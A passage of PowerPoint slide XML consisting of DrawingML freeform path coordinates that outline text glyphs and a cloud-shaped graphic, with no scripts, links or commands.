                  <a:lnTo>
                    <a:pt x="479185" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484583" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516700" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515570" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510059" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502222" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="522345" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="521668" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519454" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515773" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505384" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500212" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="516700" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498134" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503148" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509765" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511437" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511482" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523629" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523300" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521758" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519183" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516700" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="558233" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="545540" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545540" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="51461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561598" y="48706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565099" y="46471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572394" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575682" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="592562" y="42248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="584612" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588158" y="42655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590177" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591885" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="42248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="589107" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="578037" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575397" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567696" y="33825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563269" y="36693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592706" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589107" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="611646" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="597892" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628179" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640917" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647141" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634977" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611646" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="671406" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="658126" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634977" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647141" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671406" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="730669" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="720506" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712685" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684523" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683896" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684553" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714928" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715178" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723691" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728591" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733267" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742165" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746524" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719693" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716147" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709710" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706932" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704606" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702167" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700330" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697469" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696769" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696769" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752283" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752283" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752098" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696763" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697215" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697311" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699592" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707633" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713053" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745148" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744017" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738506" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730669" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="750793" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="750115" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747924" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744220" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733831" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728682" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750793" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="745148" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726581" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731618" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738213" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739884" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739930" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752098" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751767" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750217" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747633" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745148" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="786680" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="774010" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774010" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="51461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790068" y="48706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793569" y="46471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800841" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804149" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="821009" y="42248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="813059" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816628" y="42655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818645" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820332" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="42248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="817554" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="806500" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803845" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796166" y="33825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791717" y="36693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786680" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821009" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821153" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817554" y="29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B0EE9B56-2528-08C4-542C-DD7DD90117BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4817987" y="2649866"/>
              <a:ext cx="1428115" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1428114" h="913129">
                  <a:moveTo>
                    <a:pt x="598609" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="554519" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530778" y="3375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507037" y="10125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496862" y="13500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484992" y="16875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432423" y="45565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390028" y="82692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383245" y="92817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376462" y="101255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369679" y="111381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364592" y="119819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359504" y="129944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352721" y="140070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349330" y="151883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342547" y="172134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339155" y="183947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337459" y="194073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334068" y="217699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334068" y="248076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323893" y="249763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312023" y="251451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301848" y="254826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289978" y="258201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281499" y="263264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271324" y="270014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262845" y="275077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235713" y="308829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222146" y="349331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220451" y="362832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222146" y="369582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222146" y="379708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210276" y="376333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196710" y="372958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183144" y="371270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171273" y="371270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152620" y="372958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103442" y="384771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61048" y="408397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28828" y="442149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6783" y="484339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="514715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11870" y="594032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37307" y="632847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74614" y="663224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88180" y="673349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103442" y="678412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118704" y="685162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135662" y="688538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152620" y="690225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171273" y="691913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181448" y="691913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193318" y="690225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193318" y="705414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195014" y="715539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195014" y="725665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198406" y="735790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200101" y="744228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206884" y="764479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211972" y="772917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217059" y="783043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242496" y="816795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283194" y="852234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322197" y="874173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366288" y="889361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403595" y="896112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415465" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427336" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440902" y="899487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454468" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468034" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495167" y="894424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508733" y="891049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532474" y="884298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546040" y="880923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556215" y="875860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568085" y="869110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578260" y="864047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588434" y="857297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600305" y="850547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608784" y="843796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618958" y="837046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627437" y="828608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634220" y="837046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642699" y="847171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651178" y="853922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661353" y="862360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671528" y="869110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681702" y="877548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693573" y="882611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707139" y="889361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720705" y="894424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734271" y="897799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749533" y="902862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780057" y="909612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795319" y="911300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810581" y="911300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827539" y="912988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869934" y="909612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910632" y="901174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961506" y="882611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003900" y="853922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015770" y="843796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039511" y="808357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047990" y="781355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056469" y="783043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063252" y="784730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092080" y="784730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102255" y="783043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114126" y="781355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124300" y="777980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134475" y="772917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151433" y="762792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158216" y="754354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1166695" y="747603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173478" y="740853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178565" y="732415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181957" y="722290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187044" y="713852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190436" y="703726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="693600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="683475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190436" y="669974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188740" y="658161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200610" y="659849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214176" y="661536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226047" y="663224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239613" y="663224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295574" y="654786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344751" y="634535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395625" y="590657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404104" y="575469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412582" y="561968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419366" y="546780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426149" y="513028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427844" y="496152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426149" y="479276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412582" y="432023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1383754" y="389834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344751" y="359457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329489" y="349331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312532" y="342581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295574" y="337518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276920" y="332455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239613" y="329080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227743" y="330768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1215872" y="330768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204002" y="332455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="335831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192131" y="291953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190436" y="278452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188740" y="266639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185348" y="254826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181957" y="244701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178565" y="232887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168390" y="209261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158216" y="189010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151433" y="178884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144650" y="170446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137866" y="160321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129388" y="151883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122604" y="143445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114126" y="135007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105647" y="128257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097168" y="119819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076818" y="106318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034424" y="86067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964897" y="70878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953027" y="70878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930982" y="72566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910632" y="74254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890283" y="81004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869934" y="86067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832626" y="102943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817364" y="114756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800407" y="126569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783449" y="99568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773274" y="87754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763100" y="74254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739359" y="54003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725792" y="43877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710530" y="33751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695268" y="27001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681702" y="20251"/>
                  </a:lnTo>
                  <a:lnTo>
